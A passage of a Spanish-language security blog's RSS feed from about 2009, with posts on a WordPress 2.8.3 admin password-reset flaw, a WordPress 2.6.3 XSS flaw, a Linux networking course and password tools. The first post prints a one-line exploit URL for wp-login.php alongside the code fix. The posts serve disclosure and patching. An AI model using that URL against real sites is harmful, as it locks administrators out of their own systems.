isPermaLink="false">http://www.dragonjar.org/?p=2948</guid> <description><![CDATA[No se que pasa con WordPress últimamente, el investigador Francés “Laurent Gaffié” acaba de publicar un full-disclosure en el que explica una nueva vulnerabilidad en la ultima versión de WordPress 2.8.3. Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el password de administrador de un administrador impidiendo el acceso del mismo a su [...]]]></description> <content:encoded><![CDATA[<p>No se que pasa con <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> últimamente, el investigador Francés “<a
href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html" target="_blank">Laurent Gaffié</a>” acaba de publicar  un <a
href="http://lists.grok.org.uk/pipermail/full-disclosure/2009-August/070139.html">full-disclosure</a> en el que explica una nueva <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> en la ultima versión de WordPress 2.8.3.</p><p
style="text-align: center;"><img
title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2" src="http://img241.imageshack.us/img241/6261/wordpressbug.jpg" alt="wordpressbug Reseteo Remoto del Password de Admin en WordPress"  /></p><p>Esta nueva vulnerabilidad permite a un visitante mal intencionado resetar el <a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a> de <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de un <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> impidiendo el acceso del mismo a su propio panel de administración, el error se encuentra en el archivo wp-login.php que no valida adecuadamente.<span
id="more-2948"></span><br
/> Un visitante mal intencionado puede resetear el password de administrador con solo visitar un enlace como el siguiente:</p><pre><a href="http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag">http://PAGINAAQUI.COM/wp-login.php?action=rp&amp;key=o7naCKN3OoeU2KJMMsag</a></pre><p>La buena noticia es que igual de fácil a su explotación es su solución, basta con buscar en el archivo wp-login.php el código:</p><p><code>if ( empty( $key ) )</code></p><p>y remplazarlo por:</p><p><code>if ( empty( $key ) || is_array( $key ) )</code></p><p>Aunque como siempre es recomendable que actualices tu versión a la <a
href="http://wordpress.org/download/" target="_blank">WordPress a la 2.8.4</a> aun no sale oficialmente en <a
title="español" href="../tag/espanol">español</a>, pero puedes utilizar este <a
href="http://es-wordpress.googlecode.com/files/wp-2.8.3-es_ES.zip">paquete de idiomas para traducirlo</a>.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml" title="WordPress 2.6.3 vulnerable a Cross Site Scripting">WordPress 2.6.3 vulnerable a Cross Site Scripting</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a
href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a
href="http://www.dragonjar.org/nuevo-gusano-infecta-routers-modems-y-sistemas-gnu-linux.xhtml" title="Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux">Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-265.xhtml" title="Actualiza a WordPress 2.6.5">Actualiza a WordPress 2.6.5</a></li><li><a
href="http://www.dragonjar.org/actualiza-a-wordpress-263.xhtml" title="Actualiza a WordPress 2.6.3">Actualiza a WordPress 2.6.3</a></li><li><a
href="http://www.dragonjar.org/2-problemas-graves-que-se-solucionan-en-wordpress-262.xhtml" title="2 Problemas graves que se solucionan en WordPress 2.6.2">2 Problemas graves que se solucionan en WordPress 2.6.2</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml/feed</wfw:commentRss> <slash:comments>8</slash:comments> </item> <item><title>Curso de Redes en GNU Linux</title><link>http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml</link> <comments>http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml#comments</comments> <pubDate>Sat, 18 Jul 2009 05:47:33 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Cursos]]></category> <category><![CDATA[cursos virtuales]]></category> <category><![CDATA[DNS]]></category> <category><![CDATA[Redes]]></category> <category><![CDATA[Servicio]]></category> <category><![CDATA[Software Libre]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=2799</guid> <description><![CDATA[Gaston Diaz parte del staff de la Revista Tux Info, me ha enviado un correo donde comparte con toda La Comunidad DragonJAR, una serie de cursos principalmente enfocados en software libre, el segundo de esta serie de cursos que comparten con nosotros es el Curso de Redes en GNU Linux. En el curso de Redes [...]]]></description> <content:encoded><![CDATA[<p>Gaston Diaz parte del staff de la <a
href="../revista-tux-info.xhtml">Revista Tux Info</a>, me ha enviado un correo donde comparte con toda La Comunidad DragonJAR, una serie de <a
href="http://www.dragonjar.org/tag/cursos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cursos">cursos</a> principalmente enfocados en <a
href="http://www.dragonjar.org/tag/software-libre" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Software Libre">software libre</a>, el segundo de esta serie de <a
href="http://www.dragonjar.org/tag/cursos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cursos">cursos</a> que comparten con nosotros es el Curso de <a
href="http://www.dragonjar.org/tag/redes" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Redes">Redes</a> en GNU Linux.</p><p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2615/3741971040_c83df46da1.jpg" alt="3741971040 c83df46da1 Curso de Redes en GNU Linux"  title="Curso de Redes en GNU Linux" /></p><p>En el curso de Redes en GNU Linux, aprenderemos  a administrar correctamente una red creada con GNU Linux, a montar diferentes servicios de red y otras labores propias de un <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a> de red.<span
id="more-2799"></span></p><p>Las tematicas tratadas en el curso de redes con <a
href="http://www.dragonjar.org/tag/gnulinux" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con GNU/Linux">GNU/Linux</a> son:</p><ul><li>Introducción</li><li> Usuarios del sistema Unix</li><li> Servidor DCHP</li><li> Servidor <a
href="http://www.dragonjar.org/tag/dns" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con DNS">DNS</a></li><li> Entidad Certificadora</li><li> Servidor <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> Apache</li><li> NFS</li><li> Samba</li><li> Otros servicios</li><li> Copias de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> (Backup)</li><li> Servidores de Impresión</li><li> Servidor de terminales</li><li> VNC</li><li> OpenLDAP</li><li> Enrutamiento</li><li> Varios</li></ul><h2 style="text-align: center;"><a
href="http://www.clasijuy.com/usljujuy/redeslinux.tar.gz" target="_blank">Descargar Gratis el Curso de Redes con GNU Linux</a></h2><p
style="text-align: center;"><a
href="http://www.clasijuy.com/usljujuy/redeslinux.rar" target="_blank">Mirror I</a></p><p><strong>Los otros cursos de esta serie:</strong></p><ol><li><a
href="http://www.dragonjar.org/cursos-de-ubuntu.xhtml">Curso de Ubuntu</a></li><li><a
href="http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml">Curso de Redes con GNU Linux</a></li><li><a
href="http://www.dragonjar.org/curso-de-joomla-gratis.xhtml">Curso de Joomla Gratis</a></li><li><a
href="http://www.dragonjar.org/curso-de-dibujo-vectorial-con-draw.xhtml">Curso de Dibujo Vectorial con OpenOffice Draw</a></li></ol><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li><li><a
href="http://www.dragonjar.org/cursos-de-ubuntu.xhtml" title="Curso de Ubuntu">Curso de Ubuntu</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/video-tutoriales-de-wireshark.xhtml" title="Video Tutoriales de Wireshark">Video Tutoriales de Wireshark</a></li><li><a
href="http://www.dragonjar.org/sexto-festival-latinoamericano-de-instalacion-de-software-libre-en-medellin-flisol-2010.xhtml" title="Sexto Festival Latinoamericano de Instalación de Software Libre en Medellín &#8211; FLISOL 2010">Sexto Festival Latinoamericano de Instalación de Software Libre en Medellín &#8211; FLISOL 2010</a></li><li><a
href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a
href="http://www.dragonjar.org/comunidad-dragonjar-en-osum.xhtml" title="Comunidad DragonJAR en Open Source University Meetup – OSUM">Comunidad DragonJAR en Open Source University Meetup – OSUM</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml/feed</wfw:commentRss> <slash:comments>15</slash:comments> </item> <item><title>WordPress 2.6.3 vulnerable a Cross Site Scripting</title><link>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml</link> <comments>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml#comments</comments> <pubDate>Thu, 08 Jan 2009 10:48:02 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Vulnerabilidad]]></category> <category><![CDATA[WordPress]]></category> <category><![CDATA[XSS]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1793</guid> <description><![CDATA[Gracias a blogsecurity y a ayudawordpress me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog. El fallo se encuentra en la funcion &#8220;self_link() &#8220;del  archivo &#8220;wp-includes/feed.php&#8221; que al no validar correctamente los parametros de entrada permite realizar un ataque XSS [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" src="http://img123.imageshack.us/img123/19/xssvb6.jpg" alt="xssvb6 WordPress 2.6.3 vulnerable a Cross Site Scripting"  title="WordPress 2.6.3 vulnerable a Cross Site Scripting" /></p><p>Gracias a <a
href="http://blogsecurity.net/wordpress/wordpress/">blogsecurity</a> y a <a
href="http://ayudawordpress.com/problema-de-seguridad-en-wordpress-263/">ayudawordpress</a> me entero de una <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> descubierta por Jeremias Reith en <a
href="http://www.dragonjar.org/tag/wordpress" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con WordPress">WordPress</a> 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.</p><p>El fallo se encuentra en la funcion &#8220;self_link() &#8220;del  archivo &#8220;wp-includes/feed.php&#8221; que al no validar correctamente los parametros de entrada permite realizar un ataque <a
href="http://www.dragonjar.org/tag/xss" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con XSS">XSS</a> con el que se pueden acceder a las cookies del usuario y obtener privilegios de <a
href="http://www.dragonjar.org/tag/administrador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Administrador">administrador</a>.<span
id="more-1793"></span></p><p>Este problema <a
href="http://es.wordpress.org/wordpress-2.6.5-es_ES.zip" target="_blank">se solucionó en la versión WordPress 2.6.5</a>, si no quieres dar todavia el paso a la version 2.7 de wordpress es recomendable que actualices tu version a la 2.6.5 para resolver este problema de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a>.</p><p>Jeremias ha publicado un aviso en <a
href="http://seclists.org/bugtraq/2008/Nov/0209.html" target="_blank">Bugtraq</a>, en el que se explica en detalla tecnicamente el error e incluye un una <a
href="http://blogsecurity.net/wordpress/wordpress/" target="_blank">prueba de concepto</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a
href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a
href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>PassPub, Generador de Contraseñas Seguras</title><link>http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml</link> <comments>http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml#comments</comments> <pubDate>Sun, 06 Jan 2008 23:45:25 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[General]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Gratis]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Web]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=446</guid> <description><![CDATA[Anteriormente les había hablado sobre Myvidoop una aplicación web que permite administrar nuestras contraseñas fácilmente. Hoy les presento PassPub una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable. Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi [...]]]></description> <content:encoded><![CDATA[<p>Anteriormente les había hablado sobre <a
href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml">Myvidoop</a> una aplicación <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> que permite administrar nuestras <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> fácilmente.</p><p>Hoy les presento <a
href="../passpub-generador-de-contrasenas-seguras.xhtml">PassPub</a> una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable.</p><p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2019/2172809351_cbe2f31cce_o.jpg" alt="2172809351 cbe2f31cce o PassPub, Generador de Contraseñas Seguras " width="400" height="112" title="PassPub, Generador de Contraseñas Seguras " /><span
id="more-446"></span></p><p>Recordemos que un <a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a> seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos <a
href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml">Myvidoop</a>)</p><p><a
href="../passpub-generador-de-contrasenas-seguras.xhtml">PassPub</a> nos permite generar contraseñas de 64, 128 o 256bits para <a
href="http://www.dragonjar.org/tag/redes" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Redes">redes</a> inalambricas, también podemos generar <a
href="http://www.dragonjar.org/tag/passwords" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Passwords">passwords</a> de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.</p><p><a
href="http://anonym-url.com/go.php?to=https://passpub.com">Generar Passwords con PassPub</a></p><p>Mas Información:<br
/> Puedes encontrar mas información en (<a
href="http://www.puntogeek.com/2007/08/14/genera-contrasenas-al-azar-con-passpub/">I</a> <a
href="http://www.opensecurity.es/passpub-generados-de-contrasenas-seguras/">II</a> <a
href="http://noticiastech.com/wordpress/?p=13394">III</a> <a
href="http://bitelia.com/2007/08/14/passpub-generador-de-contrasenas/">IV</a> <a
href="http://www.dosbit.com/2007/08/20-passpub-%C2%BFno-quieres-pensarte-una-contrasena-generala">V</a>)</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml" title="Maneja tus Contraseñas de Forma Sencilla ">Maneja tus Contraseñas de Forma Sencilla </a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Maneja tus Contraseñas de Forma Sencilla</title><link>http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml</link> <comments>http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml#comments</comments> <pubDate>Sun, 16 Dec 2007 23:07:12 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Administrador]]></category> <category><![CDATA[Contrasena]]></category> <category><![CDATA[Gratis]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Web]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=444</guid> <description><![CDATA[Una nueva herramienta online llega para ayudar a quienes olvidan frecuentemente su contraseña o quienes usan la misma para todo. Myvidoop es una utilidad que nos permite almacenar todas nuestras contraseñas de servicios web (redes sociales, correos, foros, etc…) en un solo sitio y tras una sola clave (mas adelante veremos las ventajas y desventajas [...]]]></description> <content:encoded><![CDATA[<p>Una nueva herramienta online llega para ayudar a quienes olvidan frecuentemente su contraseña o quienes usan la misma para todo.</p><p>Myvidoop es una utilidad que nos permite almacenar todas nuestras <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> de servicios <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> (<a
href="http://www.dragonjar.org/tag/redes" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Redes">redes</a> sociales, correos, foros, etc…) en un solo sitio y tras una sola <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> (mas adelante veremos las ventajas y desventajas de esto), esta <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> única consta de un conjunto de imágenes en una especie de matriz, cuando seleccionemos la combinación correcta de imágenes, se nos rellenara el formulario de acceso del sitio en el que nos encontremos y de esta forma podremos ingresar.</p><p
align="center"><img
src="http://img101.imageshack.us/img101/6105/minitourgridxm8.png" alt="minitourgridxm8 Maneja tus Contraseñas de Forma Sencilla " width="160" height="160" title="Maneja tus Contraseñas de Forma Sencilla " /><span
id="more-444"></span></p><p>Myvidoop funciona gracias a un plugin que se integra con el navegador el cual almacena las claves de todos los servicios que tengamos asociados con Myvidoo.</p><p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2287/2111723453_f4440e2558.jpg" alt="2111723453 f4440e2558 Maneja tus Contraseñas de Forma Sencilla " width="500" height="168" title="Maneja tus Contraseñas de Forma Sencilla " /></p><p>Myvidoop también funciona como identificación de OpenID, por lo que podrás usar tu cuenta Myvidoop para loguearte en cualquier pagina que cuente con los servicios de OpenID.</p><p>Tenemos a disposición un panel desde el cual podremos agregar las contraseñas para los servicios deseados, agrupar y gestionar contraseñas, ver y activar las ips desde donde vamos a utilizar el <a
href="http://www.dragonjar.org/tag/servicio" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Servicio">servicio</a> y otras funciones.</p><p
style="font-weight: bold;">PRO`s</p><ul><li>Podrás utilizar claves seguras (números, letras, caracteres etc) de la longitud que desees sin preocuparte de olvidar luego esta clave.</li><li>Es portable, solo tienes que instalar el plugin en el navegador que te encuentres, acceder a tu cuenta y hay tendrá tus claves.</li><li>Adiós a los keyloggers, al no digitar tu <a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a> bajas considerablemente el riesgo a que te quiten tus claves por este medio (ojo, existen keyloggers que pueden capturar la pantalla o grabar vídeo, a estos si sos vulnerable).</li><li>Es muy fácil de usar.</li></ul><p><strong>CONTRAS</strong></p><ul><li> Tendremos que confiar en la ética de Myvidoop, ¿quien nos garantiza que no usen nuestros datos?.</li><li>En caso de ser atacado el portal dejamos al descubierto todos nuestras contraseñas a disposición de un atacante (no estoy diciendo que no cuenten con la <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> necesaria para prestar un servicio como este, solo digo… en el peor de los casos).</li></ul><p>Con esta herramienta es mucho mas fácil seguir consejos de seguridad tan simples como utilizar una clave diferente para cada portal, o usar números, letras y símbolos en nuestras contraseñas.</p><p><strong>Para mas información:</strong><br
/> <a
href="https://myvidoop.com/">Pagina Oficial de Myvidoop</a><br
/> <a
href="https://myvidoop.com/videos/site-tour#site-tour">Aquí un vídeo donde explican cono funciona el sistema.</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml" title="PassPub, Generador de Contraseñas Seguras ">PassPub, Generador de Contraseñas Seguras </a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/clavehotmail-com-cometiendo-delitos-desde-el-2007.xhtml" title="ClaveHotmail.com cometiendo delitos desde el 2007">ClaveHotmail.com cometiendo delitos desde el 2007</a></li><li><a
href="http://www.dragonjar.org/las-peores-contrasenas-para-el-iphone-ipod-o-ipad.xhtml" title="Las peores Contraseñas para el iPhone, iPod o iPad ">Las peores Contraseñas para el iPhone, iPod o iPad </a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-filezilla.xhtml" title="Recupera tu Password de FileZilla">Recupera tu Password de FileZilla</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/recuperar-el-codigo-contrasena-de-iphone-ipod-touch-o-ipad.xhtml" title="Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad">Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad</a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-facebook.xhtml" title="Recupera tu Password de Facebook">Recupera tu Password de Facebook</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 36/127 queries in 0.160 seconds using disk: basic
Object Caching 4975/5121 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-10 21:22:21 -->
